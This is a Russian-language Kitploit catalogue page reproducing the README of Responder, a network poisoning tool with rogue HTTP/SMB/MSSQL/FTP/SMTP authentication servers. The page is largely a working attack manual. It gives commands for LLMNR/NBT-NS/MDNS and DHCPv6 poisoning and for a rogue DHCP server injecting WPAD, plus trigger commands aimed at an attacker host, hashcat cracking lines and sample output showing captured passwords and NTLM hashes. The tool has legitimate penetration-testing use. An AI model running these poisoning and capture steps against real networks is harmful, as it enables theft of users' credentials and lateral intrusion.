Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Responder — Responder — это отравитель LLMNR, NBT-NS и MDNS, со встроенным поддельным сервером аутентификации HTTP/SMB/MSSQL/FTP/LDAP, поддерживающим NTLMv1/NTLMv2/LMv2, расширенную безопасность NTLMSSP и базовую HTTP-аутентификацию. | Kitploit
Инструменты/GitHubGitHub/lgandx/responder
Взлом паролейРазведкаАтаки на ПаролиПеречисление DNS и поддоменовЭксплуатацияЛатеральное перемещениеСбор информацииСетевая безопасностьТестирование на ПроникновениеАутентификацияDNS-ФаззингRed Teaming
6.5k8671233 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Анализ DNS
Топ в Латеральное перемещение №7
Топ в Атаки на Пароли №8
Топ в Взлом паролей №6
GitHublgandx/responder

Responder

Responder — это отравитель LLMNR, NBT-NS и MDNS, со встроенным поддельным сервером аутентификации HTTP/SMB/MSSQL/FTP/LDAP, поддерживающим NTLMv1/NTLMv2/LMv2, расширенную безопасность NTLMSSP и базовую HTTP-аутентификацию.

Репозиторий

Responder

Python Version License

Responder — это отравитель LLMNR, NBT-NS и MDNS со встроенными подставными серверами аутентификации для HTTP, SMB, MSSQL, FTP, LDAP, Kerberos, DNS и других. Он поддерживает NTLMv1/NTLMv2/LMv2, расширенную безопасность NTLMSSP и различные методы аутентификации для более чем 15 протоколов.


Содержание

  • Обзор
  • Что нового
  • Установка
  • Быстрый старт
  • Сетевое отравление
  • Подставные серверы
  • Конфигурация
  • macOS
  • Устранение неполадок

Обзор

Responder захватывает учетные данные, отвечая на запросы разрешения имен LLMNR, NBT-NS и MDNS. Когда клиент пытается разрешить несуществующее имя хоста, Responder отвечает, направляя клиента на машину атакующего, где несколько подставных серверов аутентификации захватывают учетные данные. Подставные серверы DHCP, DHCPv6 также включены и могут быть активированы отдельно.

Захваченные данные:

  • Хэши NetNTLMv1/v2 — взламываются с помощью hashcat/john
  • Хэши Kerberos AS-REQ — офлайн-взлом (hashcat -m 7500)
  • Учетные данные в открытом виде — HTTP Basic, FTP, SMTP, IMAP, LDAP, SQL и т.д.
  • Запрос-ответ — CRAM-MD5, DIGEST-MD5

Что нового

Эта версия включает:

Улучшения DHCPv6 и DNS

  • ✅ DHCPv6 INFORMATION-REQUEST — полная совместимость с Windows 10/11
  • ✅ Фильтрация доменов — нацеливание на конкретные домены (DHCPv6 и DNS)
  • ✅ Объявления маршрутизаторов — опциональное отравление IPv6-сети

Обновления почтового сервера

  • ✅ SMTP STARTTLS — захват от современных почтовых клиентов
  • ✅ IMAP STARTTLS — порт 143 с обновлением TLS
  • ✅ IMAPS — нативный SSL на порту 993
  • ✅ Улучшенный POP3 — лучшая совместимость

Улучшения Kerberos

  • ✅ Принудительный AS-REQ — принудительная аутентификация Kerberos.
  • ✅ Попытка отката к NTLM — после захвата аутентификации Kerberos вернуть KDC_ERR_ETYPE_NOSUPP

Улучшения протоколов

  • ✅ MSSQL — захват аутентификации SQL Server
  • ✅ LDAP/LDAPS — учетные данные службы каталогов
  • ✅ RDP — аутентификация удаленного рабочего стола
  • ✅ WinRM — удаленное управление Windows
  • ✅ DCERPC — аутентификация Windows RPC

Установка

Требования

  • Python 2.7 или Python 3.x
  • Linux (рекомендуется Ubuntu, Kali, Debian)
  • Права root

Системные зависимости```bash

sudo apt-get update sudo apt-get install python3 python3-pip python3-netifaces

### Установка Responder```bash
git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt

Проверка установки```bash

sudo python3 Responder.py --help

---
## Быстрый старт

### Базовое отравление```bash
# Standard LLMNR/NBT-NS poisoning
sudo python3 Responder.py -I eth0 -v

# Analyze mode (passive monitoring)
sudo python3 Responder.py -I eth0 -A -v

Атака DHCPv6```bash

Edit Responder.conf first:

[DHCPv6 Server]

DHCPv6_Domain = corp.local

sudo python3 Responder.py -I eth0 --dhcpv6 -v

### Принудительный HTTP Basic Auth```bash
sudo python3 Responder.py -I eth0 -b -v

Включить аутентификацию прокси + Rogue DHCP```bash

Enable Proxy-auth server with rogue DHCP server injecting WPAD server (highly effective)

sudo python3 Responder.py -I eth0 -Pvd

---

## Отравление сети

### Отравление LLMNR/NBT-NS/MDNS

**Цель:** Отвечать на сбои разрешения имен

**Как это работает:**
1. Клиент отправляет широковещательный запрос для несуществующего хоста
2. Responder отвечает: «Я этот хост»
3. Клиент подключается к атакующему
4. Захвачены учетные данные

**Конфигурация:**```ini
[Responder Core]
LLMNR = On
NBTNS = On
MDNS = On

Использование:```bash sudo python3 Responder.py -I eth0 -v

---

### DHCPv6 Сервер

**Цель:** Принуждение клиентов к использованию DNS атакующего через IPv6

**Возможности:**
- ✅ Поддержка INFORMATION-REQUEST (Windows 10/11)
- ✅ Поддержка SOLICIT/REQUEST
- ✅ Фильтрация доменов (точечное нацеливание)
- ✅ Router Advertisement (опционально)

**Как это работает:**
1. Windows отправляет DHCPv6 INFORMATION-REQUEST, SOLICIT, REQUEST
2. Responder отвечает: DNS = IPv6 атакующего
3. Windows отдает приоритет IPv6 DNS
4. Все DNS запросы → атакующий
5. Отравление DNS → захват учетных данных

**Конфигурация:**```ini
[DHCPv6 Server]
; Only respond to specific domain
DHCPv6_Domain = corp.local

; Send Router Advertisements
SendRA = Off

; IPv6 address to advertise
BindToIPv6 = fe80::1

Использование:```bash sudo python3 Responder.py -I eth0 --dhcpv6 -v

**Ожидаемый вывод:**```
[DHCPv6] INFORMATION-REQUEST from fe80::a1b2:c3d4
[DHCPv6] Client domain: workstation.corp.local
[DHCPv6] Matched target domain: corp.local
[DHCPv6] Responding with DNS: fe80::1
[DNS] Query: mail.corp.local (A)
[DNS] Poisoned: mail.corp.local -> 192.168.1.100
[SMTP] Captured: [email protected]:Password123

Мошеннические серверы

Responder включает 17+ мошеннических серверов аутентификации:

Файловые и сетевые службы

SMB-сервер (Порты 445, 139)

Назначение: Захват хэшей NetNTLM из общих файловых ресурсов

Возможности:

  • ✅ SMBv1/SMBv2/SMBv3
  • ✅ Захват хэшей NetNTLMv1/v2
  • ✅ Расширенная безопасность NTLMSSP
  • ✅ Отключена подпись сеанса (разрешает ретрансляцию)

Триггеры:```powershell

UNC paths

\attacker-ip\share \non-existent-server\files

NET USE commands

net use \attacker-ip\share

Windows Explorer address bar

\attacker-ip\

**Захваченный формат:**```
username::domain:challenge:response:blob

Взлом:```bash hashcat -m 5600 smb-ntlmv2.txt wordlist.txt

**Конфигурация:**```ini
[Responder Core]
SMB = On

FTP-сервер (Порт 21)

Назначение: Захват незашифрованных учётных данных FTP

Возможности:

  • ✅ Приманка для анонимного входа
  • ✅ Аутентификация USER/PASS
  • ✅ Захват незашифрованных учётных данных

Триггеры:```bash ftp attacker-ip

Username: anything

Password: anything

**Захваченный формат:**```
[FTP] Cleartext: username:password

Конфигурация:```ini [Responder Core] FTP = On

---

### Серверы баз данных

#### MSSQL Server (Порт 1433)

**Назначение:** Захват аутентификации Microsoft SQL Server

**Особенности:**
- ✅ Аутентификация SQL Server
- ✅ Аутентификация Windows (NTLM)
- ✅ SQL-учетные данные в открытом виде
- ✅ Захват хэша NetNTLMv2

**Триггеры:**```sql
-- SQL Server Management Studio
Server: attacker-ip
Authentication: SQL Server / Windows

-- Command line
sqlcmd -S attacker-ip -U sa -P password

-- Connection strings
Server=attacker-ip;Database=master;User Id=sa;Password=pass;

Захваченные форматы:``` [MSSQL] SQL Auth: sa:password123 [MSSQL] NetNTLMv2: DOMAIN\user::domain:challenge:response:blob

**Конфигурация:**```ini
[Responder Core]
SQL = On

Примечания:

  • Захватывает как SQL-аутентификацию, так и аутентификацию Windows
  • Работает с SSMS, sqlcmd, ADO.NET соединениями
  • Может захватывать учетные данные домена через Windows auth

Почтовые серверы

SMTP сервер (Порты 25, 587)

Назначение: Захват аутентификации почтовых клиентов

Особенности:

  • ✅ Поддержка STARTTLS (современные клиенты)
  • ✅ AUTH PLAIN (открытый текст)
  • ✅ AUTH LOGIN (открытый текст)
  • ✅ AUTH CRAM-MD5
  • ✅ AUTH DIGEST-MD5
  • ✅ AUTH NTLM (NetNTLMv2)
Скачать инструмент